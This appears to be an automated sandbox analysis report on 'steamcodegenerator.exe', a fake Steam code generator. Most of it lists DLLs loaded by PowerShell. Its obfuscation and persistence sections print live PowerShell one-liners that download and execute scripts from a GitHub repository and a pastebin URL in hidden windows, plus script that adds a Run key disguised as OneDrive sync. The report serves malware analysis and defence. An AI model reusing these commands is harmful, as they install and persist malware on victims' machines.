Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
Source: C:\Windows\System32\attrib.exeSection loaded: ulib.dllJump to behavior
Source: C:\Windows\System32\attrib.exeSection loaded: fsutilext.dllJump to behavior
Source: C:\Windows\System32\forfiles.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
Source: C:\Windows\System32\forfiles.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dll
Source: C:\Users\user\Desktop\steamcodegenerator.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32Jump to behavior
Source: BeginSync.lnk.3.drLNK file: ..\..\..\Windows\System32\forfiles.exe
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
Source: steamcodegenerator.exeStatic PE information: Image base 0x140000000 > 0x60000000
Source: steamcodegenerator.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: steamcodegenerator.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: steamcodegenerator.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: steamcodegenerator.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: steamcodegenerator.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: steamcodegenerator.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
Source: steamcodegenerator.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: steamcodegenerator.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Binary string: C:\Users\Bill Hillman\source\repos\steamcodegenerator\x64\Release\steamcodegenerator.pdb&& source: steamcodegenerator.exe, 00000000.00000002.3629938089.0000022AF4E20000.00000004.00001000.00020000.00000000.sdmp, steamcodegenerator.exe, 00000000.00000002.3629977699.0000022AF4E54000.00000002.10000000.00040000.00000000.sdmp
Source: Binary string: C:\Programming1\ConsoleApplication2\x64\Release\ConsoleApplication2.pdb source: steamcodegenerator.exe
Source: Binary string: dC:\Programming1\ConsoleApplication2\x64\Release\ConsoleApplication2.pdb source: steamcodegenerator.exe
Source: Binary string: C:\Users\Bill Hillman\source\repos\steamcodegenerator\x64\Release\steamcodegenerator.pdb source: steamcodegenerator.exe, 00000000.00000002.3629938089.0000022AF4E20000.00000004.00001000.00020000.00000000.sdmp, steamcodegenerator.exe, 00000000.00000002.3629977699.0000022AF4E54000.00000002.10000000.00040000.00000000.sdmp
Source: steamcodegenerator.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: steamcodegenerator.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: steamcodegenerator.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: steamcodegenerator.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: steamcodegenerator.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Data Obfuscation

barindex
Source: C:\Users\user\Desktop\steamcodegenerator.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -command start powershell -windowstyle h -args {sal notpad iEx; sal $env:os iWr; notpad(windows_nT raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/cr_asm.txt -usebasicparsing)}
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" sal notpad iEx; sal $env:os iWr; notpad(windows_nT raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/cr_asm.txt -usebasicparsing)
Source: C:\Windows\System32\forfiles.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -command powershell -windowstyle h -command 'sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle h -command "sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)"
Source: C:\Windows\System32\forfiles.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -command powershell -windowstyle h -command 'sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle h -command "sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)"
Source: C:\Users\user\Desktop\steamcodegenerator.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -command start powershell -windowstyle h -args {sal notpad iEx; sal $env:os iWr; notpad(windows_nT raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/cr_asm.txt -usebasicparsing)}Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" sal notpad iEx; sal $env:os iWr; notpad(windows_nT raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/cr_asm.txt -usebasicparsing) Jump to behavior
Source: C:\Windows\System32\forfiles.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -command powershell -windowstyle h -command 'sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)'Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle h -command "sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)"Jump to behavior
Source: C:\Windows\System32\forfiles.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -command powershell -windowstyle h -command 'sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)'Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle h -command "sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)"
Source: steamcodegenerator.exeStatic PE information: section name: _RDATA

Boot Survival

barindex
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: .lnk"if (-Not (Test-Path $googoogaagaa)) {$currentPath = [System.Environment]::GetEnvironmentVariable("PATH", "User")$newPath = $currentPath + ";$env:tmp"[System.Environment]::SetEnvironmentVariable("PATH", $newPath, "User")#New-ItemProperty -Path "HKCU:\Software\Microsoft\Windows\CurrentVersion\Run" -Name "Driver Diagnosis" -Value "regsvr32.exe /s DriverDiag" -PropertyType String -ForceNew-ItemProperty -Path "HKCU:\Software\Microsoft\Windows\CurrentVersion\Run" -Name "OneDrive File Sync" -Value '"C:\ProgramData\Microsoft OneDrive\FileSync\BeginSync.lnk"' -PropertyType String -Force#$source = "https://raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/DriverDiag.dll"#$destination = "$env:tmp\DriverDiag.dll"#Invoke-WebRequest -Uri $source -OutFile $destinationmkdir "C:\ProgramData\Microsoft OneDrive\FileSync";$savedbytes = (76,0,0,0,1,20,2,0,0,0,0,0,192,0,0,0,0,0,0,70,171,0,8,0,32,0,0,0,124,37,104,27,210,97,216,1,203,131,156,28,20,3,219,1,124,37,104,27,210,97,216,1,0,16,1,0,0,0,0,0,7,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,69,1,20,0,31,80,224,79,208,32,234,58,105,16,162,216,8,0,43,48,48,157,25,0,47,67,58,92,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,86,0,49,0,0,0,0,0,23,89,186,133,48,0,87,105,110,100,111,119,115,0,64,0,9,0,4,0,239,190,167,84,44,42,41,89,8,186,46,0,0,0,246,25,0,0,0,0,2,0,0,0,0,0,12,1,0,0,0,0,0,0,0,0,46,238,28,1,87,0,105,0,110,0,100,0,111,0,119,0,115,0,0,0,22,0,90,0,49,0,0,0,0,0,36,89,104,183,16,0,83,121,115,116,101,109,51,50,0,0,66,0,9,0,4,0,239,190,167,84,44,42,41,89,8,186,46,0,0,0,76,95,0,0,0,0,3,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,208,173,33,0,83,0,121,0,115,0,116,0,101,0,109,0,51,0,50,0,0,0,24,0,102,0,50,0,0,16,1,0,167,84,130,42,32,0,102,111,114,102,105,108,101,115,46,101,120,101,0,0,74,0,9,0,4,0,239,190,167,84,130,42,41,89,208,189,46,0,0,0,65,248,0,0,0,0,1,0,0,0,0,0,116,0,0,0,0,0,0,0,0,0,132,116,26,0,102,0,111,0,114,0,102,0,105,0,108,0,101,0,115,0,46,0,101,0,120,0,101,0,0,0,28,0,0,0,86,0,0,0,28,0,0,0,1,0,0,0,28,0,0,0,52,0,0,0,0,0,0,0,85,0,0,0,24,0,0,0,3,0,0,0,96,56,18,250,16,0,0,0,87,105,110,100,111,119,115,0,67,58,92,87,105,110,100,111,119,115,92,83,121,115,116,101,109,51,50,92,102,111,114,102,105,108,101,115,46,101,120,101,0,0,38,0,46,0,46,0,92,0,46,0,46,0,92,0,46,0,46,0,92,0,87,0,105,0,110,0,100,0,111,0,119,0,115,0,92,0,83,0,121,0,115,0,116,0,101,0,109,0,51,0,50,0,92,0,102,0,111,0,114,0,102,0,105,0,108,0,101,0,115,0,46,0,101,0,120,0,101,0,215,0,47,0,112,0,32,0,99,0,58,0,92,0,119,0,105,0,110,0,100,0,111,0,119,0,115,0,92,0,115,0,121,0,115,0,116,0,101,0,109,0,51,0,50,0,32,0,47,0,109,0,32,0,110,0,111,0,116,0,101,0,112,0,97,0,100,0,46,0,101,0,120,0,101,0,32,0,47,0,99,0,32,0,34,0,112,0,111,0,119,0,101,0,114,0,115,0,104,0,101,0,108,0,108,0,46,0,101,0,120,0,101,0,32,0,45,0,99,0,111,0,109,0,109,0,97,0,110,0,100,0,32,0,112,0,111,0,119,0,101,0,114,0,115,0,104,0,101,0,108,0,108,0,32,0,45,0,119,0,105,0,110,0,100,0,111,0,119,0,115,0,116,0,121,0,108,0,101,0,32,0,104,0,32,0,45,0,99,0,111,0,109,0,109,0,97,0,110,0,100,0,32,0,39,0,115,0,97,0,108
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: .lnk" -Forcesleep 5$googoogaagaa = "C:\ProgramData\Microsoft OneDrive\FileSync\BeginSync.lnk"if (-Not (Test-Path $googoogaagaa)) {rm $env:tmp\onedrivefilesync.dll -forceNew-ItemProperty -Path "HKCU:\Software\Microsoft\Windows\CurrentVersion\Run" -Name "OneDrive File Sync" -Value '"C:\ProgramData\Microsoft OneDrive\FileSync\BeginSync.lnk"' -PropertyType String -Forcemkdir "C:\ProgramData\Microsoft OneDrive\FileSync";$savedbytes = 